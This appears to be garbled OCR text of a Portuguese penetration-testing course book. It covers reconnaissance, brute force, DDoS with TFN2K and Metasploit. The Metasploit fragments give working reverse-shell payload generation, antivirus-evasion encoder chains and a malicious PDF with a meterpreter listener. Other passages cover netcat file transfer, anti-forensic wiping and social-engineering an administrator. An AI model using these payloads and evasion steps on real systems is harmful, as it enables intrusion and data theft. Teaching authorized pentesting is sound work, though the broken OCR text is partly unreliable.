forma ativa 1 A partir da sintaxe abaixo utilizando os programas Nmap Xprobe2 e Amap fa a o reconhecimento dos servi os e sistemas operacionais rodando nas m quinas da rede alvo e comp
134. gel ds03a tpa sagonet net 65 110 32 10 147 590 ms 147 738 ms 148 665 ms 12 kK Ok Com o traceroute podemos ver que temos 11 saltos at que os pacotes sao interrompidos o que pode representar um firewall ou algo do tipo que descarte os pacotes Agora que sabemos por quantos roteadores estamos passando podemos usar o comando ping para descobrir o TTL do site ping www 4linux com br c 1 PING www 4linux com br 66 118 142 41 56 84 bytes of data 64 bytes from 41 142 118 66 reverse priorityonline net 66 118 142 41 icmp seq 1 ttl 49 time 1452 ms www 4linux com br ping statistics 1 packets transmitted 1 received 0 packet loss time Oms rtt min avg max mdev 1452 515 1452 515 1452 515 0 000 ms Somando a quantidade de saltos 11 com o valor de ttl 49 temos 60 O mais pr ximo de 60 64 que representa o Linux A partir da podemos concluir que o sistema operacional utilizado no servidor onde o site est hospedado Linux 5 12 5 Fingerprint atrav s do xprobe2 Ferramenta para fingerprint ativo apresentada na conferencia BlackHat Las Vegas em 2001 criada por Fyodor criador da ferramenta nmap e Ofir Arkin co fundador do projeto honeynet org Seu banco de dados de assinaturas fica em Cap tulo 5 Levantamento de Informa es 70 3 l usr local etc xprobe2 xprobe2 conf Execute o xprobe2 na m quina do instrutor para descobrir o sistema operacional
135. giram os switchs onde a rede passou a trabalhar de forma mais segmentada encaminhando os pacotes apenas para a porta onde estava conectado a maquina de destino com isso dificultou o uso de ferramentas de sniffer Logo com o aparecimento dos switchs surgiram tamb m diversas formas de fazer um by pass uma delas consistia em floodar a tabela CAM do switch Esta tabela fica na rea de mem ria onde o switch mant m o mapeamento de PORTA lt gt MAC Quando fazemos o flood diversos switchs n o conseguem mais acrescentar nenhuma entrada nela passando a funcionar como um HUB Um exemplo de ferramenta que faz CAM Flood o macof que vem no pacote Cap tulo 15 T cnicas de Sniffing 180 do dsniff Abaixo temos um exemplo da sa da dessa ferramenta E twm macof a4 36 02 56 c6 c7 ba 25 93 64 4e 71 0 0 0 0 64260 gt 0 0 0 0 47849 S 1144120866 1144120866 0 win 512 2b 25 e2 3d 7b dd a4 51 7 b 69 21 0 0 0 0 31889 gt 0 0 0 0 27021 S 1667257178 1667257178 0 win 512 6a d7 cf 76 f4 ff 9e e6 2 2b 65 c5 0 0 0 0 4668 gt 0 0 0 0 13237 S 1851270478 1851270478 0 win 512 24 71 24 7d c a1 61 78 48 19 9c f8 0 0 0 0 34945 gt 0 0 0 0 36192 S 1173131637 1173131637 0 win 512 7d 28 c 47 6e ba 89 5 c9 a 34 cc 0 0 0 0 33182 gt 0 0 0 0 55401 S 1510011628 1510011628 0 win 512 e4 b8 7a 49 27 1b 17 ba 37 7e 0 14 0 0 0 0 61586 gt 0 0 0 0 62152 S 1862396522 1862396522 0 win 512 a4 f5 7 47 ba c7 d 36 38 6f 56 ce 0 0 0 0 6
136. goso O objetivo de tentar explorar uma aplica o web ganhar acesso a informa es confidenciais Aplica es web s o cr ticas para a seguran a de um sistema porque usualmente elas est o conectadas com uma base de dados que cont m informa es tais como cart es de cr dito e senhas A maior parte dos ataques atualmente n o s o realizados contra a infraestrutura organizacional mas sim contra aplica es E se houver falhas em aplica es WEB muito possivelmente o atacante conseguir acesso a todo conte do Cap tulo 13 Vulnerabilidades em aplica es web 157 existente no servidor onde a aplica o est hospedada Na maioria das vezes v rias aplica es WEB ficam hospedadas em um mesmo servidor compartilhando da mesma m quina f sica Se uma dessas v rias aplica es hospedadas no servidor tiver falhas graves que permitam acesso m quina todas as outras ser o comprometidas e o atacante tamb m poder explorar as demais m quinas acess veis na rede Um ferramenta simples online que ao varrer as vulnerabilidades de um site informa todos os dom nios hospedados no mesmo servidor o ZeroDayScan hospedado em http www zerodayscan com Ap s acessar o site basta informar o endere o do site a ser analisado seu e mail onde receber o relat rio ap s dois ou tr s dias e a chave que deve ser gravada em um arquivo com o nome zerodayscan txt e hospedado na pasta principa
137. h com ftester Documenta o http dev inversepath com ftester ftester html 11 3 2 Utiliza o a ftest ftestd Cap tulo 11 Ignorando Prote es 131 11 3 3 Sintaxe e Para pacotes TCP e UDP IP origem porta origem IP destino porta destino Flags Protocolo Tipo servi o e Para pacotes ICMP IP origem porta origem IP destino porta destino Flags ICMP tipo icmp c dig o icmp Exemplo 192 168 0 1 1 1024 10 7 0 1 20 25 S TCP 22 11 4 Detectando Honeypots Dificilmente uma organiza o ou empresa que esteja contratando profissionais para realizar um pentest possui um honeypot em sua rede Mas ainda assim existe essa possibilidade Existem v rios tipos de honeypots mas podemos dividi los basicamente em dois grandes grupos Honeypot de baixa interatividade Honeypot de alta interatividade O honeypots de baixa interatividade s o facilmente detect veis bastando utilizar boas ferramentas de varredura descoberta de vulnerabilidades e explora o pois por sua limita o de respostas e intera o com o atacante pelas respostas transmitidas ao atacante esse ltimo conseguir perceber que o alvo n o uma m quina real J com os honeypots de alta interatividade a coisa muda de figura pois suas Cap tulo 11 Ignorando Prote es 132 respostas s o mais consistentes e o comportamento bem pr ximo de um servidor real caso esteja bem configurado Com os
138. hanw SMBPass SMBUser THREADS SMB Version Detection av Console X i Show advanced options Launch 888 888Y8b SU 000 000 DOPOOOTOO 00FO00TOOU 888 888 Y8888 Y888 Y888888 88888P 88888P 888 Y88P 888 Y888 888 888 888 metasploit v3 5 1 dev core 3 5 api 1 0 636 exploits 320 auxiliary 215 payloads 27 encoders 8 nops svn r11164 updated today 2010 11 29 Apos clicar em Launch precisamos aguardar um pouco para que a varredura se complete e os hosts detectados sejam exibidos As figuras dos hosts indicam que sao maquinas WinXP ou 2003 Server Cap tulo 19 Metasploit Framework 248 Armitage Armitage View Hosts Attacks Workspaces Help rogue gt BB rservices gt sip smb pipe auditor pipe dcerpc auditor 192 168 1 203 smb2 smb enumshares smb_enumusers 5 smb login smb lookupsid IB smb version gt smtp gt fg snmp f gt E ssh telephony s gt telnet gt titp gt upnp r Eune 192 168 1 206 192 168 1 205 N XP SP2 BARE 192 168 1 203 445 is running Windows XP Service Pack 3 language English name XEN XP SPLOIT domain WORK GROUP Scanned 06 of 55 hosts 010 complete Scanned 11 of 55 hosts 020 complete Scanned 20 of 55 hosts 036 complete Scanned 24 of 55 hosts 043 complete Scanned 28 of 55 hosts 050 complete 192 168 1 250 445 is runni
139. icas de invas o de sistemas sem d vida o brute force O m todo de funcionamento de um ataque desse tipo muito simples s o geradas v rias tentativas de conex o a partir do nome de um prov vel usu rio da m quina alvo A t cnica consiste em gerar v rias combina es de senhas para esse usu rio na tentativa de adivinhar a senha dele Tamb m podemos alternar o nome do usu rio fazendo brute force de usu rio e senha Para isso podemos obter um arquivo chamado wordlist no qual podemos gerar diversas combina es poss veis de senhas para testar com o brute force Baseados nisso veremos algumas ferramentas para realizar esse tipo de teste 12 3 Wordlist Uma boa wordlist fundamental para o sucesso de um ataque de brute force poss vel comprar wordlists fazer download ou at mesmo gerar listas de palavras que ser o usadas pelas ferramentas de brute force 12 3 1 Download de Wordlist Wordlists podem ser encontradas em diversos locais incluindo redes de compartilhamento de arquivos P2P Abaixo seguem alguns sites que possuem wordlists para download Site e http www1 harenet ne jp waring vocab wordlists vocfreqg html e hitp www outpost9 com files WordLists html e http wordlist sourceforge net Cap tulo 12 T cnicas de For a Bruta 135 e http rapidshare com files 100861231 28GBwordlist rar P2P e eMule e Kazaa e Torrent 12 4 Gera o de Wordlist Existem d
140. ificar um sistema a fim de permitir que um atacante ganhe acesso ao mesmo Muitos v rus e worms carregam trojans e backdoors Um v rus e um worm s o softwares maliciosos malware A principal diferen a entre o v rus e o worm que o primeiro precisa ser executado para infectar o sistema O segundo se espalha automaticamente tendo um poder de infec o muito maior Os v rus para come ar a trabalhar precisam ser ativados ou seja voc precisa executar o programa infectado Somente ap s isso ele come ar a infectar outros arquivos Se algum arquivo infectado for levado e executado em outro computador ent o o v rus come ar a atacar os arquivos dos outros computadores tamb m Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 122 Tanto os v rus quanto os cavalos de tr ia n o conseguem infectar um computador externo sem a ajuda de uma pessoa O worm ou verme um programa que pode infectar tanto uma m quina local quando uma m quina externa Normalmente os worms exploram falhas de seguran a em outros programas para se propagarem como o caso do worm BLASTER que ficou mundialmente conhecido ap s infectar milhares de computadores e poucas horas Esse worm explorava um problema de programa o em um servi o conhecido por rpc dcom que vem ativado por padr o nos sistemas operacionais Windows 2000 e Windows XP Por m nem todos os Worms s o destrutivos Alguns worms j foram lan ados p
141. il com gt Adicionar remetente a lista de contatos Date Fri 7 May 2010 11 56 10 0300 Message ID lt r2v4da582081005070756pc0de571fu78a59b6aa99d4bb2 mail gmail com gt Subject 1SO 8859 12Q Teste_de_cabe E7alho_de_e 2Dmail To loki_br yahoo com br Content Type multipart alternative boundary 000e0cd29860b6e12e04860243f6 Content Length 482 Na do cabe alho sublinha e em negrito encontramos o IP de quem enviou essa mensagem no caso o IP 10 151 8 14 No cabe alho podemos encontrar v rios campos Received pois por cada servidor de e mail que a mensagem passa adicionado um novo campo Por m o endere o de quem enviou a mensagem vai aparecer no campo Received mais baixo no exemplo acima o ltimo Received de nosso cabe alho pois cada servidor de e mail que adiciona esse campo vai colocando sempre acima do primeiro campo adicionado E como podemos obter o cabe alho de um e mail No Yahoo Basta clicarmos em Cabe alhos Completos Cap tulo 5 Levantamento de Informa es 66 f Teste de cabe alho de e mail Sexta feira 7 de Maio de 2010 11 56 De o Luiz Vieira lt luizwt gmail com gt PS Para Luiz Vieira http hackproofing blogspot com 58 os tetos i podma QE tara D Selecionar a codifica o da mensagem Cabecalhos pone 5 12 Fingerprint Fingerprint uma das principais t cnicas de levantamento de informa o footprint que realizada por um Pen Tester antes que o mes
142. ilizaremos em nossa varredura e enumera o de servi os 5 6 Consultando websites antigos Al m da possibilidade de utilizarmos a op o em cache do Google poss vel utilizarmos outros servi os que possibilitam que acessemos vers es mais antigas de qualquer site que j tenha sido publicado na web http www archive org Com isso podemos encontrar informa es que podem ser teis principalmente para ataques de engenharia social pois encontramos produtos antigos ex funcion rios informa es que foram retiradas do site por serem sens veis e etc Utilizando esse servi o e pesquisando o site da 4Linux obtemos o seguinte resultado INTERNET ARCHIVE Way aeh maohi CA RE http All i Take Me Back Adv Search Compare Archive Pages Searched for http www 4linux com br 65 Results Note some duplicates are not shown See all denotes when site was updated Material typically becomes available here 6 months after collection See FAO Search Results for Jan 01 1996 Dec 18 2009 1996 1997 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 Opages Opages Opages Opages Opages 2 pages 12 pages 14 pages Qpages Opages 2 pages 19 pages Gpages 0 pages Oct 26 2001 May 25 2002 Jan 09 2003 Jan 24 2004 Oct 04 2006 Apr 10 2007 Jan 02 2008 Nov 30 2001 Jun01 2002 Feb07 2003 Feb 08 2004 Dec 05 2006 May 14 2007 Jan
143. inhas de texto ser o enviadas ou recebidas l Coloca no netcat em estado de escuta listening L Coloca no netcat em estado de escuta listening reiniciando o netcat com a mesma linha de comando caso a conex o feche n For a o netcat a usar apenas endere os de IP num ricos sem fazer consultas a servidores DNS o filename Usando para obter um log dos dados de entrada ou sa da em formato hexadecimal p Especifica a porta a ser usada sujeito a disponibilidade e a restri es de privil gio r Faz as portas do portscan serem escolhidas aleatoriamente s Especifica o endere o IP da interface usada para enviar os pacotes Pode ser usado para spoofing de IPs bastando apenas configurar uma interface do tipo eth0 0 usando o ifconfig com o IP desejado t Permite usar o nc para criar sess es de telnet por script Precisa estar compilado com a op o DTELNET u Usar UDP ao inv s de TCP Cap tulo 10 Trojans Backdoors V rus Rootkits e Worms 124 e v Controla o nivel de mensagens mostradas na tela e w Limita o tempo maximo para que uma conex o seja estabelecida e z Para evitar o envio de dados atrav s de uma conex o TCP e limitar os dados de uma conex o UDP 10 6 2 Netcat Utiliza o Transfer ncia de arquivos e No servidor E netcat l p 5050 gt pass txt e No cliente cat pass txt netcat ip_ server 5050
144. io participe de outros grupos locais na m quina com privil gio diferente do privil gio atual do atacante Quando exploramos alguns servi os nem sempre conseguimos acesso root Esse o caso da explora o de um PHP Inject que vimos anteriormente Alguns outros exemplos podem ser usados como explora o de um daemon que n o executado como root Portanto para conseguirmos controlar totalmente a m quina e pode executar programas que precisam de privil gios de administrador precisamos aumentar nosso privil gio localmente Por m a escala o de privil gios n o est limitada apenas a aumentar os privil gios dentro do sistema operacional mas em qualquer sistema Por exemplo podemos ter um acesso limitado a um servidor de banco de dados Oracle e desejamos nos tornar DBA podendo assim acessar todas as tabelas e bases de dados existentes no banco O ato de tornar um usu rio com mais privil gios tamb m chamado de eleva o de privil gios Exemplos de caso onde podemos realizar o ataque e Explora o de aplica o web que n o executada como root e Explora o de servi os que n o s o executados como root ou tem seu privil gio dropado e Explora o interna de um aplicativo por exemplo um Banco de Dados Oracle e Quando conseguimos uma senha local sem privil gio administrativo Ex Bruteforce em servidor ssh Cap tulo 14 Eleva o de Privil gios Locais 176 14 3 Poss veis
145. iversas ferramentas que auxiliam na gera o de uma wordlist Abaixo listaremos algumas das ferramentas que podem ser usadas para a realiza o dessa tarefa E l crunch 5 8 12345678 gt tmp wordlist numeric Onde e 5 tamanho m nimo da palavra e 8 tamanho maximo da palavra e 12345678 Caracteres que ser o usados para a gera o da lista Temos mais algumas op es a definir com esta ferramenta mas desta vez vamos tentar criar combina es mais pr ximas do mundo real onde muitas vezes ou por falta de criatividade ou medo de esquecer a senha as pessoas acabam associando ao pr prio nome uma data casamento namoro nascimento anivers rio do papagaio etc Vamos ver como poder amos adivinhar a senha o J nior Cap tulo 12 T cnicas de For a Bruta 136 E crunch 10 10 1234567890 t junior gt tmp juniorlist Onde e 10 tamanho m nimo da palavra e 10 tamanho m ximo da palavra e 1234567890 Caracteres que ser o usados para a gera o da lista Vamos fazer uso de outra ferramenta para gerar wordlists no caso a ferramenta wyd A diferen a dessa ferramenta para o crunch que essa utiliza uma maneira mais inteligente de gerar as combina es Vamos gerar a wordlist com baseado em um arquivo HTML de um site qualquer que fizemos download a amp wyd pl o tmp wordlist meu dump html Eliminando as palavras repetidas 5 cat
146. ja poss vel saber o que voc est levando consigo Wipe um aplicativo que permite a dele o segura de dados permitindo que o usu rio defina quais arquivos ser o apagados e quantas vezes aqueles blocos de disco onde os arquivos apagados estavam alocados Cap tulo 20 Apagando Rastros 266 ser o sobreescritos Quanto mais vezes se sobreescreve mais dif cil a posterior recupera o dos dados Cada opera o de sobreescrita deve ser realizada at o final para que o prorama seja completamente eficaz e Scrub gt Outra possibilidade para realizar o data wiping sobrescrevendo os dados deletados com um padr o determinado de informa es que podem ou n o ser removidas no final da informa o Se n o forem removidas o perito forense encontrar apenas lixo digital nos blocos do disco sem qualquer coer ncia e Steghide gt Steghide um programa de esteganografia que capaz de esconder dados em v rios tipos de arquivos de udio e de imagem As frequ ncias de som e de cor respectivamente n o s o alteradas tornando o arquivo resistente contra testes estat sticos de primeira ordem Formatos de arquivos JPEG BMP WAV e AU s o suportados para uso como arquivo de cobertura N o h restri es sobre o formato dos dados secretos O algoritmo de criptografia padr o o Rijndael com uma chave de 128 bits de comprimento que AES Advanced Encryption Standard Se voc n o confia nesta
147. ju zos estrondosos 1 6 4 Autenticidade Propriedade respons vel por garantir que a informa o vem da origem informada permitindo a comunica o segura e garantia de que a informa o a qual tem acesso correta e de fonte confi vel 1 6 5 Legalidade a propriedade que define se determinada informa o ou opera o est de acordo com as leis vigentes no pa s As mesmas leis que regem um pa s podem ser completamente diferentes em outro o que pode ocasionar uma s rie de problemas caso o sistema de gest o n o seja adapt vel Podemos ver na figura a seguir alguns dos dist rbios mais comuns aos pilares da SI vinculados a ataques que visam rea de TI Cap tulo 1 Introdu o Seguran a da Informa o 19 Browsing Procurar por informa es sem necessariamente saber seu tipo Confidencialidade Shoulder surfing papagaio de pirata Olhar sobre o ombro da pessoa o que digitado Engenharia Social Fingir ser algu m com a inten o de ter acesso a informa es Modificar uma mensagem Interceptar uma mensagem alter la e envi la ao seu destino original Altera o de logs de auditoria Modificar os logs de auditoria Integridade normalmente com a inten o de ocultar fatos Modifica o de arquivos de Alterar arquivos cr ticos em um sistema configura o para modificar sua fucionalidade Desastres naturais ou provocados Vandalismo inc ndios terremotos terrorismo vulcani
148. l do site que ser analisado ABOUT FAQ FEEDBACK BLOG CONTACT Start Free Website Security Scan Site name http www 4linux com br iter site name For example http www zerodayscan com m E mail Address luiz vieira 4linux com br Type your E mail Address again luiz vieira 4linux com br Verify your domain ownership Ae file zerodayscan txt in the root directory of your site http www zerodayscan com zerodayscan txt 2 Paste the following text to this file f2e1b51bb3e35b56a8eeb8721effeB6f download this o your website to ensure us that you have permission to use our scanner Essa ltima parte pode ser um pouco mais complicada de conseguir No entanto utilizando da engenharia social poss vel conseguir que o administrador do site fa a o upload do arquivo para o site ou at mesmo lhe passe os dados para fazer o login do ftp do servidor onde o site alvo est hospedado Cap tulo 13 Vulnerabilidades em aplica es web 158 13 4 Principais Classes de Vulnerabilidades Baseado no TOP 10 OWASP que um ranking das 10 maiores vulnerabilidades WEB atualizado anualmente seguem abaixo as vulnerabilidades mais exploradas em aplica es WEB Command Injection SQL Injection Cross Site Scripting XSS CSRF Insecure Direct Object Reference Falha de Autentica o e gerenciamento de sess o Falhas em configura o de seguran a Insecure Cryptographic Storage Failure to Restrict UR
149. lica o e poss vel solu o para cada falha encontrada e explorada Passo 6 Entregue o relat rio ao cliente O relat rio p s teste entregue APENAS para a pessoa respons vel pela contrata o do teste de invas o ou definida em contrato Como as informa es contidas em tal relat rio s o extremamente sens veis deve se tomar o m ximo cuidado poss vel para que o mesmo n o caia nas m os de pessoas sem autoriza o para ter acesso ao mesmo O ideal que a equipe n o guarde nem mesmo uma c pia do relat rio e isso deve ser definido no NDA e no contrato de servi o Essa medida extrema tomada justamente para evitar qualquer vazamento poss vel de informa es 2 8 Aspectos Legais importante atentarmos para os aspectos legais de um teste de invas o e se os mesmo est o de acordo com as leis vigentes no pa s e principalmente com o que foi assinado no contrato de presta o de servi o ou NDA Devemos lembrar nos de uma coisa Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 39 TESTE DE INVAS O SEM PERMISS O CRIME Portanto tenha sempre um contrato pr vio assinado com o cliente onde ser o definidos os seguintes pontos e Limites do teste at onde pode ir e Hor rios per odos de menor utiliza o ou menos cr ticos e Equipe de suporte caso haja algu m para tomar provid ncias caso algu m ataque tenha efeitos colaterais e Contatos ao menos tr s contat
150. list e Modo Incremental Este o modo mais poderoso do JtR Nele ser o tentadas todas as combina es poss veis de caracteres para tentar quebrar a senha cifrada Dada a grande quantidade de combina es poss veis recomend vel que se defina alguns par metros como tamanho da senha ou conjunto de caracteres a serem utilizados para que voc n o fique esperando pela senha ser quebrada por muito tempo Todos os par metros para este modo s o definidos no arquivo john conf nas se es come adas com Incremental no nome e Modo External Esse modo bastante complexo Nele voc pode definir regras pr prias para o John seguir ao tentar quebrar uma senha Tais regras s o definidas em uma linguagem parecida com a C no arquivo de configura o do programa Ao ser especificado este modo ao tentar quebrar uma senha na linha de comando o JtR vai pr processar as fun es que voc escreveu para este modo e utiliz las A documenta o de uso desse modo pode ser obtida em http www openwall com john doc EXTERNAL shtml Cap tulo 12 T cnicas de For a Bruta 140 12 5 2 LINHA DE COMANDO O John suporta v rias op es de linha de comando geralmente usadas para ativar determinados modos de uso do software Preste bastante aten o no case das op es o JtR case sensitive Uma caracter stica muito legal dele que poss vel abreviar as op es da linha de comando desde que n o haja ambiguidade
151. load que funcione Procure manter se sempre atualizado com as novas vers es do Metasploit pois os pacotes de exploits payloads e m dulos sempre s o atualizados e vem com novas op es 19 12 Pr tica dirigida 19 12 1 Payload com Meterpreter Com o msf atualizado iremos criar o payload que enviaremos para o nosso alvo Prosseguimos com o seguinte comando Cap tulo 19 Metasploit Framework 231 E amp msfpayload windows shell reverse tcp LHOST XX XX XX XX LPORT 4455 X gt cliqueaqui exe Ser criado no diret rio corrente o arquivo execut vel cliqueaqui exe Vamos analisar o nosso execut vel com alguns antiv rus on line para ver como ele ser caracterizado quando o alvo abri lo no Windows tw http www virustotal com pt http virusscan jotti org pt br Depois dos resultados vamos fazer um tunning em nosso exe 3 amp msfpayload windows shell reverse tcp LHOST XX XX XX XX LPORT 4455 R msfencode c 15 e x86 shikata ga nai a x86 t raw msfencode c 5 a x86 e x86 alpha mixed t raw msfencode c 3 e x86 call4 dword xor t exe gt cliqueaqui2 exe A op o c diz quantas vezes cada encoder ir interagir com o nosso payload nos dias de hoje isso j n o adianta muito demonstrado apenas para ver as possibilidades de se redirecionar a sa da de um encoder para outro Depois do tunning em nosso exe vamos test lo nos mesmos sites de
152. m contrato de presta o de servi o onde est descrito o que ser realizado escopo hor rios equipe de profissionais permiss es etc e assinado por contratado e contratante Al m de um contrato de presta o de servi o de grande import ncia a assinatura de um NDA non disclosure agreement que define que as informa es que a equipe do teste de invas o ter acesso n o ser o revelados ou divulgados excetuando se pessoa que assinou o contrato de presta o de servi o Passo 3 Prepare um time de profissionais e agende o teste Aqui reunimos os profissionais que participar o dos testes e lhes passamos todas as informa es pertinentes ao que ser realizado Cap tulo 2 Introdu o ao Teste de Invas o e tica Hacker 38 A partir da forma o da equipe e defini o de pap is para cada profissional podemos agendar o teste com o cliente e iniciar o planejamento do mesmo com a equipe em conjunto Passo 4 Realize o teste Nesse passo onde o teste efetivamente executado Lembrando sempre de seguir o que foi acordado com o cliente e respeitar as cl usulas do contrato e NDA assinados Passo 5 Analise os resultados e prepare um relat rio Todas as informa es coletadas resultados obtidos e ocorr ncias durante a realiza o do teste s o posteriormente reunidas e analisadas Os resultados dessas an lises s o colocados em um relat rio contextualizados e feita a descri o exp
153. m1wNAUfAp z0SA X Originating IP 209 85 217 219 Authentication Results mta1079 mail sk1 yahoo com from gmail com domainkeys pass ok from gmail com dkim pass ok Received from 127 0 0 1 EHLO mail gx0 f219 google com 209 85 217 219 by mta1079 mail sk1 yahoo com with SMTP Fri 07 May 2010 07 56 36 0700 Received by mail gx0 1219 google com with SMTP id 19s0660108gxk 0 for lt loki_br yahoo com br gt Fri 07 May 2010 07 56 35 0700 PDT DKIM Signature v 1 a rsa sha256 c relaxed relaxed d gmail com s gamma h domainkey signature received mime version received from date message id subject to content type bh zsRzXj YMy4NDiWycSOHoC4K65BBPQ2mLafsg2 kxiuw b CYkBO1Xf3yKkxCEx7UvNmaW cWNEMA r36T4PB1JSK5eVKUJo9C9hR4swW XwiR7viL TVSM2su91xQEDeze7exMMS3A MjyhRxzp7QQ68bZ4x0B VuRORY VIkKWUTszHt4dykALpDj jw9xejN3sknjCsTFUp20bbUqiA6gpELFciw2I DomainKey Signature a rsa shal c nofws d gmail com s gamma h mime version from date message id subject to content type b gt Med0d9UySGBRwXazfwundBvqX1ZJNUH8VoL ZhudCurMouA QscyQz5mxE iglcyHOL qe9J5pqC2yz7SNjwoqR0eaP VGwRfdg PCN6DN9isKvYhVZqKdv9JUVKSAFRZSZ60Rswa SHUIJcbqyPXhPX Yk6GKNDBAKTC3Ty 4ZnKEXE Received by 10 150 243 17 with SMTP id q17mr4368907ybh 103 1273244190925 Fri 07 May 2010 07 56 30 0700 PDT MIME Version 1 0 Received by 10 151 8 14 with HTTP Fri 7 May 2010 07 56 10 0700 PDT From Este remetente verificado pelo DomainKeys Luiz Vieira lt luizwt gma
154. mbis que efetivamente executam o ataque Um computador mestre pode ter sob sua responsabilidade at milhares de computadores Repare que nestes casos as tarefas de ataque DoS s o distribu das a um ex rcito de m quinas escravizadas Da que surgiu o nome Distributed Denial of Service A imagem abaixo ilustra a hierarquia de computadores usadas em ataques DDoS al m de ilustrar tamb m um ataque DoS e DRDos Cap tulo 9 Testando o sistema 107 Attacker Attacker Attacker Web Server Web Server Web Server a DOS b DDOS c DRDOS Como exemplo real de ataques DDoS ajudados por v rus tem se os casos das pragas digitais Codered Slammer e MyDoom Existem outros mas estes s o os que conseguiram os maiores ataques j realizado 9 4 1 Ferramenta de DDoS TFN2K Esta foi a primeira ferramenta de ataque DDoS disponivel publicamente O TFN foi escrito por Mixter Os ataques efetuados pelo TFN sao e UDP Flooding e TCP SYN Flooding e ICMP Flooding e e Smurf Attack Cap tulo 9 Testando o sistema 108 9 4 2 Pr tica dirigida Vamos testar formando grupos de quatro a utiliza o do TFN2K para realizar um ataque de nega o de servi os onde um ser o alvo dois os slaves e um o master que controla o ataque Cada um do grupo ir revezar de papel com os outros fazendo um rod zio O controle dos mestres feito por linha de comando e a execu o do programa deve ser acompanhada dos p
155. merciais com caracter sticas semelhantes inevit vel Projetos CANVAS da Immunity Sec ou CORE IMPACT da Core Security Technology tem uma grande clientela que v o desde grandes clientes corporativos que fazem uso destes produtos na hora de fazerem suas pr prias tentativas de invas o at centenas de consultores de seguran a independente que utilizam no como uma ferramenta para vender este servi o a terceiros Sem d vida a principal diferen a entre Metasploit Framework e este tipo de produto o foco Embora os produtos comerciais precisem fornecer constantemente aos seus clientes os mais recentes exploits acompanhados de interfaces gr ficas bonitas e intuitivas o Metasploit Framework projetado para facilitar a investiga o e experimenta o de novas tecnologias Este ponto entre outros faz com que exista mercado para todos Os pesquisadores estudantes curiosos e independentes podem obter sem qualquer custo o Metasploit modificar personalizar utiliz lo para seu trabalho e ver como ele funciona internamente para aprender mais enquanto que por outro lado grandes empresas que exigem uma excelente solu o corporativa e pode arcar com o custo possui certamente o privil gio da qualidade dos produtos anteriormente mencionados 19 4 Instalando Metasploit Framework Em primeiro lugar pois como comentado nos par grafos anteriores Metasploit Framework pode ser instalado tanto no Unix Linux quanto no Windows
156. meterpreter bind tcp gt set RHOST m quina objetivo gt exploit Desta forma podemos realizar um bypass usando o Metasploit 19 12 8 Atacando m quinas Windows XP Vista 7 2003 2008 atrav s de um webserver falso Essa explora o baseia se na falha existente no Windows em todas as suas vers es no que diz respeito a manipula o de arquivos Ink Essa falha assim como seu exploit tornaram se p blicos no final de na segunda quinzena de julho 2010 O mais interessante que ap s tornar p blica a falha e consequentemente o exploit que surgiu um dia depois da divulga o da falha por parte da Microsoft a corre o da mesma s foi sair quase um m s depois deixando milh es de m quinas vulner veis a esse simples mas devastador ataque Cap tulo 19 Metasploit Framework 243 Vamos l O primeiro comando seleciona o explot que ser usado 3 gt use exploit windows browser ms10 046 shortcut icon dilloader Caso queiramos mais informa es sobre o exploit e sua respectiva falha podemos digitar o seguinte comando E gt info Esse comando exibir al m das informa es sobre a falha as op es que precisamos configurar para o correto funcionamento do exploit As op es obrigat rias s o SRVHOST SRVPORT Vamos configur las 5 gt set SRVHOST 192 168 0 83 Esse ltimo comando permitir configurarmos o IP no qual o servidor w
157. meu host local LHOST 192 168 0 110 especifiquei minha porta local LPORT 4455 e logo em seguida dei o comando exploit Agora vamos enviar o nosso arquivo planilha2 pdf para nosso alvo v tima Mas antes vamos deixar o msf escutando com o exploit multi handler veja a configura o na imagem abaixo Es gt back gt use exploit multi handler gt set PAYLOAD windows meterpreter reverse tcp gt set LHOST 192 168 0 110 gt set LPORT 4455 gt exploit msf exploit gt back msf gt use exploit multi handler msf exploit gt set PAYLOAD windows meterpreter reverse tcp PAYLOAD gt windows meterpreter reverse tcp msf exploit gt set LHOST 192 168 0 110 LHOST gt 192 168 0 110 msf exploit gt set LPORT 4455 LPORT gt 4455 msf exploit gt exploit Started reverse handler on 192 168 0 110 4455 Starting the payload handler Usamos o exploit multi handler selecionamos nosso payload windows meterpreter reverse tcp especificamos nosso host local LHOST 192 168 0 110 especificamos nossa porta que ficar escutando LPORT 4455 e por fim executamos com o comando exploit O arquivo pdf gerado pode ser enviado para o alvo que esteja executando em sua m quina o Windows XP SP3 por exemplo Executado o arquivo pdf agora veja que ganhamos uma conex o meterpreter com o alvo Cap tulo 19 Metasploit Framework 241 msf exploit gt exploit Started reverse handler o
158. milhares de vezes maior do que o m todo de brute force Vamos ver passo a passo como utilizar o software RainbowCrack Esse software inclui tr s ferramentas que devem ser usadas em sequ ncia para fazer a coisa funcionar e Passo 1 usar o rtgen para gerar as rainbow tables Cap tulo 12 T cnicas de For a Bruta 148 e Passo 2 usar o rtsort para organizar as rainbow tables geradas pelo rtgen e Passo 3 usar o rcrack para buscar o conte do das rainbow tables organizadas pelo rtsort O processo de buscar o conte do no passo final equivalente ao processo de quebra de hash E todas essas ferramentas s o utilizadas atrav s da linha de comando 12 9 2 Passo 1 usar o rtgen para gerar as rainbow tables O programa rtgen precisa de diversos par metros para gerar uma rainbow table e a sintaxe do comando rtgen hash algorithm charset plaintext len min plaintext len max table index chain len chain num part index Explica o dos par metros par metro significado hash algorithm O algoritmo dos hashs Im ntlm md5 e assim por diante usado na rainbow table charset A configura o dos caracteres charset do texto plano na rainbow tables Todos os charsets poss veis est o definidos no arquivo charset txt plaintext len min Estes dois par metros definem o tamanho plaintext len max poss vel de todo o texto plano na rainbow tables Se o charset num rico o plaint
159. minado host est usando al m de manter um hist rico das vers es que o mesmo host j usou anteriormente Http www netcraft com 5 9 Buscando relacionamentos Atrav s de relacionamentos encontrados na web podemos conseguir mais informa es de nosso alvo Informa es de relacionamentos podem ser encontradas em site com links para o site do alvo sites secund rios que tem rela o com o site principal do alvo companhias que fazem neg cios ou est o sob a mesma administra o que nosso alvo e etc Essas servem para entendermos melhor como a organiza o trabalha se possui outros ramos de atividades organiza es irm s e parcerias Com tais informa es em m os e um melhor conhecimento da estrutura organizacional podemos inclusive realizar ataques de engenharia social mais eficazes O Google nos fornece alguns operadores que nos auxiliam nessa busca e que j estudamos anteriormente S o eles e info o link e related Cap tulo 5 Levantamento de Informa es 62 http www unmask parasites com 5 10 Pr tica dirigida Vamos realizar algumas consultas A partir do site www 4linux com br consiga o m ximo de informa es poss veis a partir dos seguintes comandos e Whois retornar o resultado da consulta entidade respons vel 